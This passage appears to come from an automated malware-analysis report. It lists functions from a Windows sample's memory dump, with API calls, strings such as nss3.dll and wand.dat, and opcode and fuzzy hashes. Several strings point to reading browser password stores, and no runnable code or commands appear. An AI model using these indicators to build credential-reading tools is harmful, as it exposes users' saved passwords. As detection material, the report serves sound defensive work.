CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040D8DB,00000000,?,0040D8DB,?,General,?), ref: 00411E03
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 00411E0A

Strings

General, xrefs: 00411DD6

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$CloseCreateFileHandle
String ID: General
API String ID: 999786162-26480598
Opcode ID: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
Instruction ID: 9a0facac0be4658f1d28dd1d6e0b9c096870c14066d41f215ae7e32982aabb00
Opcode Fuzzy Hash: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
Instruction Fuzzy Hash: 9AF024B2508301BFF3109B90AC85EAF769CDB10799F20842FF20591061DA396D50825D

Uniqueness

Uniqueness Score: -1.00%

Function 004071BD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
_snwprintf.MSVCRT ref: 004071FE
MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217

Strings

Error %d: %s, xrefs: 004071ED
Error, xrefs: 00407208

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
Instruction ID: 3b05860ebe56c522f2c5ab20428fa68284bb982c16b5ab54bfd07cc8ba07ffa8
Opcode Fuzzy Hash: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
Instruction Fuzzy Hash: 74F0E23680021867DB11AB94CC02FDA72ACBB54B82F0400AAB905F2180EAF4EB404A69

Uniqueness

Uniqueness Score: -1.00%

Function 00412455, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shlwapi.dll,769048C0,?,004048E6,00000000), ref: 0041245E
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484

Strings

shlwapi.dll, xrefs: 00412457
SHAutoComplete, xrefs: 00412466

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
Instruction ID: b7e45597e31c4a606350929a185ef34a25fe7475720eeaf8429eabe2a59cceae
Opcode Fuzzy Hash: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
Instruction Fuzzy Hash: 6BD05B393502206BA7116F35BC48EAF2E65EFC6F537150031F501D1260CB544E429669

Uniqueness

Uniqueness Score: -1.00%

Function 0043310B, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

Strings

oid, xrefs: 004331D5
foreign key constraint failed, xrefs: 004333AB
new, xrefs: 00433199
old, xrefs: 0043318F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
Instruction ID: 956c7fa9d19c0f39a897be9568c0d7cc0038550a6314a583777b8070e5951de7
Opcode Fuzzy Hash: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
Instruction Fuzzy Hash: 90E18F71E00208EFDF14DFA5D881AAEBBB5FF48304F14846EE805AB251DB79AE41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0042EDD2, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042EED2
memcpy.MSVCRT ref: 0042EFE9

Strings

unknown column "%s" in foreign key definition, xrefs: 0042EFB9
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042EE56
foreign key on %s should reference only one column of table %T, xrefs: 0042EE2E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: 6721413135cb80f6c7830db15d00ec34f898aec14dfdc0ca678aab1d574fd5fd
Instruction ID: 495bb5eb18a6352e4e4c54452741b55d9a16d19d8a312fbbfa639f366bc90293
Opcode Fuzzy Hash: 6721413135cb80f6c7830db15d00ec34f898aec14dfdc0ca678aab1d574fd5fd
Instruction Fuzzy Hash: 72914C71A0021ADFCB10CF5AD580A9EBBF1FF58314B55856AE809AB302D735E945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004063C1, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004063E2
wcslen.MSVCRT ref: 004063ED
wcslen.MSVCRT ref: 004063FB
memset.MSVCRT ref: 00406451

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

nss3.dll, xrefs: 004063F3, 004063F8, 0040640C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcslen$wcscatwcscpy
String ID: nss3.dll
API String ID: 1250441359-2492180550
Opcode ID: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
Instruction ID: 7e6fc29c8000acf8dfdc2cef167c58109b3e52db234c734628f4c22aee9d38d0
Opcode Fuzzy Hash: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
Instruction Fuzzy Hash: E711ECB2D0421DAADB10E750DD45BCA73EC9F10314F1004B7F60CE20C2F778AA548A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE21, Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06

??3@YAXPAX@Z.MSVCRT ref: 0040AE3C
??3@YAXPAX@Z.MSVCRT ref: 0040AE4F
??3@YAXPAX@Z.MSVCRT ref: 0040AE62
??3@YAXPAX@Z.MSVCRT ref: 0040AE75
free.MSVCRT(00000000), ref: 0040AEAE

Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 1ee9c0bd248601916a1146cb301d571c7104734ae8e82a7a1079c5bd7d19b95f
Instruction ID: 5cedf5899733f7fd452d28a3e5974aab2a3b061775a7969347507653aae84efd
Opcode Fuzzy Hash: 1ee9c0bd248601916a1146cb301d571c7104734ae8e82a7a1079c5bd7d19b95f
Instruction Fuzzy Hash: 13010832946A20ABC6367B2AD50251FB368BE91B90306457FF445BB3818F3C7C5186DF

Uniqueness

Uniqueness Score: -1.00%

Function 00414CBE, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00414CC6
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00414CE6
malloc.MSVCRT ref: 00414CEC
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00414D0A
free.MSVCRT(?), ref: 00414D13

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$ApisFilefreemalloc
String ID:
API String ID: 4053608372-0
Opcode ID: 812cbb7add7f674ff0468623c6e7b50f355b1e49695ec4f29896983211f76786
Instruction ID: 44ea64674f021cea2031e16b60495934b5371f4db2927085d3abb6a650cf4446
Opcode Fuzzy Hash: 812cbb7add7f674ff0468623c6e7b50f355b1e49695ec4f29896983211f76786
Instruction Fuzzy Hash: 6601F4B140011DBEAF115FA9DCC5CAF7EACDA457E8720036AF810E2190E6344E4056B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A302, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040A314
GetWindowRect.USER32 ref: 0040A321
GetClientRect.USER32 ref: 0040A32C
MapWindowPoints.USER32 ref: 0040A33C
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040A358

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
Instruction ID: 816d64d46c4b910dad83cc5cff1f19606824cbaca0e9d5d20ff5cebd8420fa85
Opcode Fuzzy Hash: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
Instruction Fuzzy Hash: 06014836800129BBDB11AFA59C49EFFBFBCFF46B15F044169F901A2190D77896028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004421EB, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,00410671,?,?), ref: 00442202
??2@YAPAXI@Z.MSVCRT ref: 00442216
memset.MSVCRT ref: 00442225

Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA

??3@YAXPAX@Z.MSVCRT ref: 00442248

Part of subcall function 00441FDC: memchr.MSVCRT ref: 00442017
Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420BB
Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420CD
Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420F5

CloseHandle.KERNEL32(00000000), ref: 0044224F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: b598463014c614ebe371b6abc587b169cc581dfa21e6606e22753a0b647566d4
Instruction ID: 5cd116c641245c85bcd5bad65d9d69835b0888748ca48550e443bbafd66aa86b
Opcode Fuzzy Hash: b598463014c614ebe371b6abc587b169cc581dfa21e6606e22753a0b647566d4
Instruction Fuzzy Hash: 3DF0FC325041007AE21077329D4AF6B7B9CDF85761F10053FF515911D2EA789904C179

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADBB, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
??3@YAXPAX@Z.MSVCRT ref: 0040AE06

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 71da32900e05e7392b15d97de4efa56f9abc2cc5c2514c7a65295a7a2cc172a2
Instruction ID: 7485fa72425b52f9fdb5b203d173836123891f19866e380edd82503d68adac07
Opcode Fuzzy Hash: 71da32900e05e7392b15d97de4efa56f9abc2cc5c2514c7a65295a7a2cc172a2
Instruction Fuzzy Hash: D8F0FF72509701AFD720AF6999D991BB7F9BF943147A0493FF049D3A41CB78A8904A18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C35B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C37F
memset.MSVCRT ref: 0040C396

Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03

_snwprintf.MSVCRT ref: 0040C3C5

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

Strings

</%s>, xrefs: 0040C3B4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
String ID: </%s>
API String ID: 168708657-259020660
Opcode ID: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
Instruction ID: 40532074a48dce177473b235f1db1661615fe75cb863f0afecc7fe9ed9b88556
Opcode Fuzzy Hash: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
Instruction Fuzzy Hash: 910136F3D4012976EB20A755DC45FEE76BCEF45308F4000B6BB09B7181DB78AA458AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A414, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A44E
SetWindowTextW.USER32(?,?), ref: 0040A47E
EnumChildWindows.USER32 ref: 0040A48E

Strings

caption, xrefs: 0040A463

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
Instruction ID: f5bb4e3483ddd063dbb45333af41605001ac6cd66b5ccbc099165aa82e617e5a
Opcode Fuzzy Hash: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
Instruction Fuzzy Hash: 44F0C83690031466FB20EB51DD4EB9A3768AB04755F5000B6FF04B61D2DBF89E50CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00415B1D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300), ref: 00415B2D

Part of subcall function 00414C63: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74E05970,?,00414D8E,?), ref: 00414C81
Part of subcall function 00414C63: malloc.MSVCRT ref: 00414C88

LocalFree.KERNEL32(?), ref: 00415B71
free.MSVCRT(?,0044A338,?), ref: 00415B9F

Strings

OsError 0x%x (%u), xrefs: 00415B83

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFormatFreeLocalMessageMultiWidefreemalloc
String ID: OsError 0x%x (%u)
API String ID: 3381508148-2664311388
Opcode ID: 317725ff073779cdd8c5ce4ba96fe4f866af21b3c2bf0b3b6c117ee0e1c09207
Instruction ID: 6343b10a9b723c0e7aff6e97c2bb6ccba49d3023d178a2aa7622176c4439a0fa
Opcode Fuzzy Hash: 317725ff073779cdd8c5ce4ba96fe4f866af21b3c2bf0b3b6c117ee0e1c09207
Instruction Fuzzy Hash: AAF09034A44204FFDB11AFA5DC4ACDE7F70EFC5B15B20002BF40165250E67A6BC09B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040103E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004075AD: memset.MSVCRT ref: 004075B7
Part of subcall function 004075AD: wcscpy.MSVCRT ref: 004075F7

CreateFontIndirectW.GDI32(?), ref: 0040105D
SendDlgItemMessageW.USER32 ref: 0040107C
SendDlgItemMessageW.USER32 ref: 0040109A

Strings

MS Sans Serif, xrefs: 00401049

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
String ID: MS Sans Serif
API String ID: 210187428-168460110
Opcode ID: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
Instruction ID: b86dbe1d582a7894089203107e7a1e4413fc3d6f7e8de8594febed0b37e93160
Opcode Fuzzy Hash: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
Instruction Fuzzy Hash: 56F05E75A4030877E621ABA0DC06F8A7BB9B740B01F000935B711B51E0D7E4A285C658

Uniqueness

Uniqueness Score: -1.00%

Function 004076CD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004076EC
GetClassNameW.USER32 ref: 00407703
_wcsicmp.MSVCRT ref: 00407715

Strings

edit, xrefs: 0040770F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
Instruction ID: 51a03c7d5923a90201923a44b10f324a390683a0d3b2f84b2934c4bf373e0ab9
Opcode Fuzzy Hash: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
Instruction Fuzzy Hash: A9E04872D8031E7AFB14ABA0DC4BFA977BCBB04704F5001F5B615E10D2EBB4A6454A5C

Uniqueness

Uniqueness Score: -1.00%

Function 004121C3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6

Strings

shell32.dll, xrefs: 004121CC
SHGetSpecialFolderPathW, xrefs: 004121E0

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2574300362-880857682
Opcode ID: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
Instruction ID: 4b50289c71ca44835333f785f02b611be4b8370b72da6f54bb0e40a9521e89f3
Opcode Fuzzy Hash: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
Instruction Fuzzy Hash: 86D0C774600313BADB108F209D48B4239746712743F251036F430D1771DF7895C49A1C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0C3, Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041B0D6
memcpy.MSVCRT ref: 0041B0EC
memcmp.MSVCRT ref: 0041B0FB
memcmp.MSVCRT ref: 0041B143
memcpy.MSVCRT ref: 0041B15E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
Instruction ID: 295c5a0bc2866328f8dcc37ada2a4d99e769f04d629d2bea2717987aff5dfa66
Opcode Fuzzy Hash: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
Instruction Fuzzy Hash: 01217C72E10248BBDB18DAA5DC56E9F73ECEB44740F50042AB512D7281EB78E644C765

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5BA, Relevance: 6.3, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E5D9
memset.MSVCRT ref: 0040E5EF
memset.MSVCRT ref: 0040E601
memcpy.MSVCRT ref: 0040E626
memset.MSVCRT ref: 0040E630

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
Instruction ID: 5db9a22820b402d4d4dd4a010236648e296a7231ae54e5ee969484aed16c8927
Opcode Fuzzy Hash: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
Instruction Fuzzy Hash: D301F0B174070077D335AA35CC03F1A73E49FA1714F400E1DF152666C2D7F8A105866D

Uniqueness

Uniqueness Score: -1.00%

Function 00415494, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004154B8
memset.MSVCRT ref: 004154E8

Part of subcall function 0041538D: memset.MSVCRT ref: 004153AA
Part of subcall function 0041538D: UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA

Part of subcall function 00414EFE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F2A
Part of subcall function 00414EFE: SetEndOfFile.KERNEL32(?), ref: 00414F54
Part of subcall function 00414EFE: GetLastError.KERNEL32 ref: 00414F5E

Strings

,A, xrefs: 00415560
%s-shm, xrefs: 004154FC

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$File$ErrorLastUnlockUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: %s-shm$,A
API String ID: 1271386063-2158068007
Opcode ID: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
Instruction ID: 8012e8fd2c705de7aa363bc2bd32bd15ad04531b7aa24a5a7ab2fd91cc4b7507
Opcode Fuzzy Hash: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
Instruction Fuzzy Hash: B1510671504B05FFD710AF21DC02BDB77A6AF80754F10481FF9299A282EBB9E5908B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00415804, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004158E7
MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 00415912
GetLastError.KERNEL32 ref: 00415939
CloseHandle.KERNEL32(00000000), ref: 0041594F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID:
API String ID: 1661045500-0
Opcode ID: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
Instruction ID: 02e61587b06ba7d058713df3830c0e33945dcb010177779d6ae1e8dc7ea6695b
Opcode Fuzzy Hash: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
Instruction Fuzzy Hash: B6518EB4214B02DFD724DF25C981AA7B7E9FB84315F10492FE88286651E734E854CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C345, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004132EA: memset.MSVCRT ref: 00413304

memcpy.MSVCRT ref: 0042C42D

Strings

virtual tables may not be altered, xrefs: 0042C384
Cannot add a column to a view, xrefs: 0042C39A
sqlite_altertab_%s, xrefs: 0042C3FE

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpymemset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1297977491-2063813899
Opcode ID: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
Instruction ID: 3e8a37011c5d834ac6e6d4f8fd11fd3d4e87e0ccd438cada7bf19ffd6667b676
Opcode Fuzzy Hash: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
Instruction Fuzzy Hash: 03419D71A00615AFDB10DF69D881A5EB7F0FF08314F24856BE8489B352D778EA51CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0042E398, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042E4D8

Strings

, , xrefs: 0042E415
CREATE TABLE , xrefs: 0042E44D
, xrefs: 0042E40E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE
API String ID: 3510742995-3459038510
Opcode ID: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
Instruction ID: 75c0c8dac0447bb43292008ef446c40d7ab48a9469891862f1914eead86e2b05
Opcode Fuzzy Hash: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
Instruction Fuzzy Hash: C3518171E00219DFCF10DF9AD4856AEB7B5FF44309F64809BE841AB205D778AA45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040475A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004047A1

Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D

Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2

Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97

Part of subcall function 00407AB6: GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
Part of subcall function 00407AB6: wcscpy.MSVCRT ref: 00407B0D

Strings

dat, xrefs: 004047A6
wand.dat, xrefs: 004047C7
*.*, xrefs: 004047E2

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
String ID: *.*$dat$wand.dat
API String ID: 3589925243-1828844352
Opcode ID: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
Instruction ID: 6d0f55f818233349c8d1636aac4371a0276c995c789a620d4a51b657e5e4e923
Opcode Fuzzy Hash: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
Instruction Fuzzy Hash: 6F419971A04206AFDB14EF61D885AAE77B4FF40314F10C42BFA05A71C2EF79A9958BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBC1, Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B

wcslen.MSVCRT ref: 0040CBEF
_wtoi.MSVCRT ref: 0040CBFB
_wcsicmp.MSVCRT ref: 0040CC49
_wcsicmp.MSVCRT ref: 0040CC5A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

